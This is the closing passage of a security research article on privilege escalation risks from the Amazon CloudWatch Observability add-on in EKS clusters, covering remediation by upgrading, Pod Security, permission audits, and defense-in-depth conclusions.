To remove the specific vulnerability relating to the aws-auth ConfigMap, simply upgrading to any version of the add-on from version v5.3.0-eksbuild.1 onwards will address the issue. However, as discussed above, this will not remove all privilege escalation paths for EKS clusters using the Amazon CloudWatch Observability add-on. Therefore, cluster owners must take a decision based on the threat model of their environment along with their risk appetite on whether to continue using this add-on. To exploit either of the escalation paths discussed here, an attacker would need to gain access to a cluster node and therefore it is not trivial to exploit; other misconfigurations or vulnerabilities would need to be present to provide an attacker a route to the node. Implementing restrictive Pod Security may be sufficient to mitigate the risk enough to continue using the add-on with its privilege escalation risk. In an environment with more sensitive workloads it may be necessary to disable the add-on and lose the tightly integrated observability features.

A more general recommendation, which applies to administrators of all Kubernetes clusters and not just EKS instances, is to audit the permissions of identities operating within the cluster. This should include identities provided by third party tooling, as these may introduce weaknesses in the permission model, as was the case in the examples discussed here. Tools such as IceKube can be used to quickly and easily identify escalation paths from different positions within a cluster.

Conclusions

By design, observability tools often need both to be present on every node and to hold a higher level of privilege in order to gather the data they require. This makes them a prime source of unintended privilege escalation paths through the cluster, and they should therefore be closely examined for potential security weaknesses. These tools should aim to follow a design architecture that limits the data-gathering DaemonSet’s permissions to read-only, with the more impactful write permissions separated onto a management deployment that can be scheduled onto a separate, privileged node.

Using managed services like EKS provides many advantages in expediting deployments, as many facets are handled by the service. However, the danger comes from assuming that because it is a managed service, it is immune from any security issues. In the case of the aws-auth ConfigMap vulnerability described here, a cluster owner could implement EKS features following all guidance and unwittingly introduce vulnerabilities to their environment. This vulnerability did not require any misconfigurations to be exploitable. It remains critical to perform holistic security reviews, taking on the mindset of an attacker and considering how they might impact systems. After all, an attacker will not care whether a resource is user-controlled or a managed service; they will exploit it if it helps them achieve their objective.

Defense-in-depth remains an essential aspect of security. Applying techniques such as pod separation along with the principle of least privilege (for users and workloads) can help provide layers of protection in the event of an attacker gaining a foothold. If someone manages to kick down the front door, it’s less of a concern if they are restricted to the entrance hall that contains no valuables. At the very least, cluster owners should be aware of the potential routes an attacker could take and what impact they could have in such a scenario; in cases where there are no options to completely remove the risk, being aware of it can help focus attention on mitigations and other security controls to minimize the likelihood of a serious security breach.